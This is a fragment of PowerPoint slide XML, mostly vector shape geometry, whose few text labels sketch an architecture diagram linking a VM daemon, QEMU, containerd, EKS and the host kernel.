                      <a:pt x="153" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="174"/>
                      <a:pt x="153" y="173"/>
                      <a:pt x="153" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="171"/>
                      <a:pt x="153" y="170"/>
                      <a:pt x="153" y="170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54" y="168"/>
                      <a:pt x="154" y="166"/>
                      <a:pt x="154" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="164"/>
                      <a:pt x="154" y="163"/>
                      <a:pt x="154" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="161"/>
                      <a:pt x="155" y="159"/>
                      <a:pt x="155" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="158"/>
                      <a:pt x="153" y="158"/>
                      <a:pt x="152" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="158"/>
                      <a:pt x="151" y="158"/>
                      <a:pt x="150" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="158"/>
                      <a:pt x="150" y="158"/>
                      <a:pt x="150" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="158"/>
                      <a:pt x="150" y="158"/>
                      <a:pt x="150" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="158"/>
                      <a:pt x="149" y="158"/>
                      <a:pt x="149" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="158"/>
                      <a:pt x="149" y="158"/>
                      <a:pt x="149" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="158"/>
                      <a:pt x="148" y="157"/>
                      <a:pt x="148" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="157"/>
                      <a:pt x="147" y="157"/>
                      <a:pt x="146" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="156"/>
                      <a:pt x="146" y="156"/>
                      <a:pt x="146" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="156"/>
                      <a:pt x="144" y="155"/>
                      <a:pt x="143" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="154"/>
                      <a:pt x="143" y="154"/>
                      <a:pt x="143" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="154"/>
                      <a:pt x="142" y="154"/>
                      <a:pt x="142" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="153"/>
                      <a:pt x="141" y="153"/>
                      <a:pt x="141" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="152"/>
                      <a:pt x="139" y="150"/>
                      <a:pt x="138" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="146"/>
                      <a:pt x="134" y="143"/>
                      <a:pt x="135" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="114"/>
                      <a:pt x="139" y="94"/>
                      <a:pt x="139" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="60"/>
                      <a:pt x="139" y="46"/>
                      <a:pt x="141" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="31"/>
                      <a:pt x="141" y="31"/>
                      <a:pt x="141" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="24"/>
                      <a:pt x="119" y="12"/>
                      <a:pt x="119" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="6"/>
                      <a:pt x="119" y="6"/>
                      <a:pt x="119" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="0"/>
                      <a:pt x="25" y="17"/>
                      <a:pt x="18" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="32"/>
                      <a:pt x="22" y="57"/>
                      <a:pt x="33" y="74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6" y="79"/>
                      <a:pt x="39" y="84"/>
                      <a:pt x="41" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="96"/>
                      <a:pt x="58" y="110"/>
                      <a:pt x="67" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="115"/>
                      <a:pt x="83" y="93"/>
                      <a:pt x="82" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="81"/>
                      <a:pt x="67" y="70"/>
                      <a:pt x="71" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="73"/>
                      <a:pt x="82" y="83"/>
                      <a:pt x="85" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="78"/>
                      <a:pt x="87" y="76"/>
                      <a:pt x="86" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="69"/>
                      <a:pt x="74" y="62"/>
                      <a:pt x="67" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="62"/>
                      <a:pt x="57" y="59"/>
                      <a:pt x="51" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="49"/>
                      <a:pt x="44" y="42"/>
                      <a:pt x="44" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="38"/>
                      <a:pt x="78" y="35"/>
                      <a:pt x="84" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="47"/>
                      <a:pt x="90" y="56"/>
                      <a:pt x="88" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="91" y="70"/>
                      <a:pt x="91" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="76"/>
                      <a:pt x="92" y="80"/>
                      <a:pt x="90" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="84"/>
                      <a:pt x="89" y="84"/>
                      <a:pt x="88" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="85"/>
                      <a:pt x="88" y="85"/>
                      <a:pt x="88" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="92"/>
                      <a:pt x="83" y="108"/>
                      <a:pt x="77" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="117"/>
                      <a:pt x="72" y="118"/>
                      <a:pt x="70" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="131"/>
                      <a:pt x="59" y="143"/>
                      <a:pt x="58" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="179"/>
                      <a:pt x="59" y="195"/>
                      <a:pt x="62" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="202"/>
                      <a:pt x="81" y="196"/>
                      <a:pt x="91" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="190"/>
                      <a:pt x="114" y="182"/>
                      <a:pt x="128" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="163"/>
                      <a:pt x="132" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="160"/>
                      <a:pt x="134" y="161"/>
                      <a:pt x="133" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="161"/>
                      <a:pt x="133" y="161"/>
                      <a:pt x="133" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="162"/>
                      <a:pt x="132" y="162"/>
                      <a:pt x="132" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="163"/>
                      <a:pt x="132" y="163"/>
                      <a:pt x="132" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="163"/>
                      <a:pt x="131" y="164"/>
                      <a:pt x="131" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="164"/>
                      <a:pt x="131" y="164"/>
                      <a:pt x="131" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="164"/>
                      <a:pt x="131" y="165"/>
                      <a:pt x="131" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="183"/>
                      <a:pt x="109" y="195"/>
                      <a:pt x="92" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="200"/>
                      <a:pt x="90" y="200"/>
                      <a:pt x="88" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="201"/>
                      <a:pt x="87" y="201"/>
                      <a:pt x="87" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="202"/>
                      <a:pt x="85" y="202"/>
                      <a:pt x="84" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="202"/>
                      <a:pt x="83" y="203"/>
                      <a:pt x="82" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="203"/>
                      <a:pt x="81" y="204"/>
                      <a:pt x="80" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="204"/>
                      <a:pt x="79" y="205"/>
                      <a:pt x="78" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="205"/>
                      <a:pt x="77" y="206"/>
                      <a:pt x="76" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="206"/>
                      <a:pt x="75" y="207"/>
                      <a:pt x="74" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="207"/>
                      <a:pt x="73" y="208"/>
                      <a:pt x="72" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="210"/>
                      <a:pt x="66" y="211"/>
                      <a:pt x="63" y="213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="213"/>
                      <a:pt x="63" y="213"/>
                      <a:pt x="63" y="213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="221"/>
                      <a:pt x="40" y="229"/>
                      <a:pt x="34" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="235"/>
                      <a:pt x="23" y="230"/>
                      <a:pt x="14" y="237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="246"/>
                      <a:pt x="11" y="260"/>
                      <a:pt x="19" y="271"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="283"/>
                      <a:pt x="30" y="287"/>
                      <a:pt x="40" y="301"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="316"/>
                      <a:pt x="54" y="324"/>
                      <a:pt x="60" y="319"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="312"/>
                      <a:pt x="76" y="297"/>
                      <a:pt x="65" y="284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="270"/>
                      <a:pt x="47" y="264"/>
                      <a:pt x="63" y="255"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="253"/>
                      <a:pt x="71" y="252"/>
                      <a:pt x="75" y="250"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="246"/>
                      <a:pt x="101" y="246"/>
                      <a:pt x="112" y="244"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="244"/>
                      <a:pt x="112" y="244"/>
                      <a:pt x="112" y="244"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="243"/>
                      <a:pt x="114" y="243"/>
                      <a:pt x="115" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="243"/>
                      <a:pt x="115" y="243"/>
                      <a:pt x="116" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="243"/>
                      <a:pt x="117" y="243"/>
                      <a:pt x="118" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="242"/>
                      <a:pt x="118" y="242"/>
                      <a:pt x="119" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="242"/>
                      <a:pt x="121" y="242"/>
                      <a:pt x="122" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="236"/>
                      <a:pt x="149" y="231"/>
                      <a:pt x="157" y="221"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="208"/>
                      <a:pt x="152" y="195"/>
                      <a:pt x="153" y="182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9" name="Freeform 1296">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48408076-667C-C244-842F-9507C46B7D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4595" y="1940393"/>
                <a:ext cx="1707374" cy="1784207"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 200"/>
                  <a:gd name="T1" fmla="*/ 191 h 209"/>
                  <a:gd name="T2" fmla="*/ 62 w 200"/>
                  <a:gd name="T3" fmla="*/ 197 h 209"/>
                  <a:gd name="T4" fmla="*/ 72 w 200"/>
                  <a:gd name="T5" fmla="*/ 206 h 209"/>
                  <a:gd name="T6" fmla="*/ 86 w 200"/>
                  <a:gd name="T7" fmla="*/ 209 h 209"/>
                  <a:gd name="T8" fmla="*/ 100 w 200"/>
                  <a:gd name="T9" fmla="*/ 204 h 209"/>
                  <a:gd name="T10" fmla="*/ 106 w 200"/>
                  <a:gd name="T11" fmla="*/ 200 h 209"/>
                  <a:gd name="T12" fmla="*/ 200 w 200"/>
                  <a:gd name="T13" fmla="*/ 100 h 209"/>
                  <a:gd name="T14" fmla="*/ 100 w 200"/>
                  <a:gd name="T15" fmla="*/ 0 h 209"/>
                  <a:gd name="T16" fmla="*/ 0 w 200"/>
                  <a:gd name="T17" fmla="*/ 100 h 209"/>
                  <a:gd name="T18" fmla="*/ 59 w 200"/>
                  <a:gd name="T19" fmla="*/ 191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209">
                    <a:moveTo>
                      <a:pt x="59" y="191"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="192"/>
                      <a:pt x="61" y="194"/>
                      <a:pt x="62" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="199"/>
                      <a:pt x="65" y="204"/>
                      <a:pt x="72" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="206"/>
                      <a:pt x="82" y="207"/>
                      <a:pt x="86" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="209"/>
                      <a:pt x="99" y="207"/>
                      <a:pt x="100" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="202"/>
                      <a:pt x="104" y="200"/>
                      <a:pt x="106" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="197"/>
                      <a:pt x="200" y="153"/>
                      <a:pt x="200" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="45"/>
                      <a:pt x="155" y="0"/>
                      <a:pt x="100" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="0"/>
                      <a:pt x="0" y="45"/>
                      <a:pt x="0" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="140"/>
                      <a:pt x="24" y="175"/>
                      <a:pt x="59" y="191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0" name="Freeform 1297">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5AE51EB-0847-FB4D-B3B9-8561AAB1CB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18766" y="3767284"/>
                <a:ext cx="1690301" cy="853687"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 186 w 198"/>
                  <a:gd name="T1" fmla="*/ 30 h 100"/>
                  <a:gd name="T2" fmla="*/ 168 w 198"/>
                  <a:gd name="T3" fmla="*/ 17 h 100"/>
                  <a:gd name="T4" fmla="*/ 118 w 198"/>
                  <a:gd name="T5" fmla="*/ 7 h 100"/>
                  <a:gd name="T6" fmla="*/ 28 w 198"/>
                  <a:gd name="T7" fmla="*/ 0 h 100"/>
                  <a:gd name="T8" fmla="*/ 27 w 198"/>
                  <a:gd name="T9" fmla="*/ 3 h 100"/>
                  <a:gd name="T10" fmla="*/ 0 w 198"/>
                  <a:gd name="T11" fmla="*/ 16 h 100"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 52 h 100"/>
                  <a:gd name="T14" fmla="*/ 8 w 198"/>
                  <a:gd name="T15" fmla="*/ 100 h 100"/>
                  <a:gd name="T16" fmla="*/ 84 w 198"/>
                  <a:gd name="T17" fmla="*/ 34 h 100"/>
                  <a:gd name="T18" fmla="*/ 119 w 198"/>
                  <a:gd name="T19" fmla="*/ 25 h 100"/>
                  <a:gd name="T20" fmla="*/ 143 w 198"/>
                  <a:gd name="T21" fmla="*/ 29 h 100"/>
                  <a:gd name="T22" fmla="*/ 152 w 198"/>
                  <a:gd name="T23" fmla="*/ 37 h 100"/>
                  <a:gd name="T24" fmla="*/ 169 w 198"/>
                  <a:gd name="T25" fmla="*/ 45 h 100"/>
                  <a:gd name="T26" fmla="*/ 162 w 198"/>
                  <a:gd name="T27" fmla="*/ 34 h 100"/>
                  <a:gd name="T28" fmla="*/ 158 w 198"/>
                  <a:gd name="T29" fmla="*/ 27 h 100"/>
                  <a:gd name="T30" fmla="*/ 178 w 198"/>
                  <a:gd name="T31" fmla="*/ 35 h 100"/>
                  <a:gd name="T32" fmla="*/ 193 w 198"/>
                  <a:gd name="T33" fmla="*/ 43 h 100"/>
                  <a:gd name="T34" fmla="*/ 186 w 198"/>
                  <a:gd name="T35" fmla="*/ 3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8" h="100">
                    <a:moveTo>
                      <a:pt x="186" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="180" y="25"/>
                      <a:pt x="177" y="21"/>
                      <a:pt x="168" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="12"/>
                      <a:pt x="124" y="7"/>
                      <a:pt x="118" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="7"/>
                      <a:pt x="56" y="4"/>
                      <a:pt x="28" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="1"/>
                      <a:pt x="28" y="2"/>
                      <a:pt x="27" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="8"/>
                      <a:pt x="14" y="15"/>
                      <a:pt x="0" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="40"/>
                      <a:pt x="4" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="65"/>
                      <a:pt x="8" y="80"/>
                      <a:pt x="8" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="70"/>
                      <a:pt x="53" y="44"/>
                      <a:pt x="84" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="28"/>
                      <a:pt x="107" y="26"/>
                      <a:pt x="119" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="25"/>
                      <a:pt x="138" y="26"/>
                      <a:pt x="143" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="31"/>
                      <a:pt x="149" y="34"/>
                      <a:pt x="152" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="44"/>
                      <a:pt x="165" y="50"/>
                      <a:pt x="169" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="41"/>
                      <a:pt x="166" y="38"/>
                      <a:pt x="162" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="30"/>
                      <a:pt x="157" y="27"/>
                      <a:pt x="158" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="27"/>
                      <a:pt x="169" y="30"/>
                      <a:pt x="178" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="41"/>
                      <a:pt x="191" y="45"/>
                      <a:pt x="193" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="40"/>
                      <a:pt x="192" y="35"/>
                      <a:pt x="186" y="30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1" name="Freeform 1298">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B88650D-2259-5F49-A62E-A1EA2CE12E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67522" y="5722228"/>
                <a:ext cx="435380" cy="640266"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 51"/>
                  <a:gd name="T1" fmla="*/ 0 h 75"/>
                  <a:gd name="T2" fmla="*/ 29 w 51"/>
                  <a:gd name="T3" fmla="*/ 4 h 75"/>
                  <a:gd name="T4" fmla="*/ 4 w 51"/>
                  <a:gd name="T5" fmla="*/ 9 h 75"/>
                  <a:gd name="T6" fmla="*/ 9 w 51"/>
                  <a:gd name="T7" fmla="*/ 49 h 75"/>
                  <a:gd name="T8" fmla="*/ 4 w 51"/>
                  <a:gd name="T9" fmla="*/ 56 h 75"/>
                  <a:gd name="T10" fmla="*/ 4 w 51"/>
                  <a:gd name="T11" fmla="*/ 57 h 75"/>
                  <a:gd name="T12" fmla="*/ 0 w 51"/>
                  <a:gd name="T13" fmla="*/ 67 h 75"/>
                  <a:gd name="T14" fmla="*/ 0 w 51"/>
                  <a:gd name="T15" fmla="*/ 67 h 75"/>
                  <a:gd name="T16" fmla="*/ 29 w 51"/>
                  <a:gd name="T17" fmla="*/ 73 h 75"/>
                  <a:gd name="T18" fmla="*/ 51 w 51"/>
                  <a:gd name="T19" fmla="*/ 67 h 75"/>
                  <a:gd name="T20" fmla="*/ 45 w 51"/>
                  <a:gd name="T21" fmla="*/ 41 h 75"/>
                  <a:gd name="T22" fmla="*/ 51 w 51"/>
                  <a:gd name="T23" fmla="*/ 0 h 75"/>
                  <a:gd name="T24" fmla="*/ 50 w 51"/>
                  <a:gd name="T25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75">
                    <a:moveTo>
                      <a:pt x="50" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="2"/>
                      <a:pt x="37" y="3"/>
                      <a:pt x="29" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="5"/>
                      <a:pt x="12" y="7"/>
                      <a:pt x="4" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="32"/>
                      <a:pt x="13" y="44"/>
                      <a:pt x="9" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="51"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="4" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="56"/>
                      <a:pt x="4" y="56"/>
                      <a:pt x="4" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="60"/>
                      <a:pt x="2" y="64"/>
                      <a:pt x="0" y="67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75"/>
                      <a:pt x="14" y="73"/>
                      <a:pt x="29" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="73"/>
                      <a:pt x="51" y="75"/>
                      <a:pt x="51" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="57"/>
                      <a:pt x="45" y="52"/>
                      <a:pt x="45" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="38"/>
                      <a:pt x="49" y="20"/>
                      <a:pt x="51" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="51" y="0"/>
                      <a:pt x="50" y="0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" name="Овал 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{287B4ABE-8694-FF4C-90C2-5F8D6FB6C504}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="8638707" y="1865765"/>
                <a:ext cx="1563234" cy="1563235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42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216E3CB-46CE-DA48-8DB1-8442A657BFBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732380" y="1814214"/>
            <a:ext cx="778076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mVMd</a:t>
            </a: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+ QEMU + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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eklet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what we need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to implement</a:t>
            </a:r>
          </a:p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Elastic Kubernetes Service (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EKS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894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AF93DC7-0854-0D4C-9265-F5D00AFE7050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CC37400-1854-D54B-9EF0-8362EDEC8607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2234870" y="1394598"/>
            <a:ext cx="8081720" cy="5380277"/>
            <a:chOff x="2258620" y="1477723"/>
            <a:chExt cx="8081720" cy="538027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E606600-1973-BE47-9C28-98D3CC0FB900}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4298641" y="3866726"/>
              <a:ext cx="797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QEMU</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN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40DBFC-DE33-5642-97CA-03C73CD1CCEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7588065" y="3866726"/>
              <a:ext cx="797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QEMU</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN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00E7401-72F2-9A44-A2A8-3CA1E1DFD7FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4180113" y="3076834"/>
              <a:ext cx="4238734" cy="3781166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4691B714-0E52-8148-A872-F00B0D85F9AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5231075" y="3198284"/>
              <a:ext cx="2252799" cy="524931"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FAD0BF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containerd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+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altLang="zh-CN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mVMd</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN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7" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546088C3-7670-6043-ADD3-459ED9239C85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4397102" y="6397814"/>
              <a:ext cx="3898754" cy="32781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3130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6895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0025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3155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66920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0050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3815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06945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1800" dirty="0"/>
                <a:t>Host</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                <a:t>Kernel</a:t>
              </a:r>
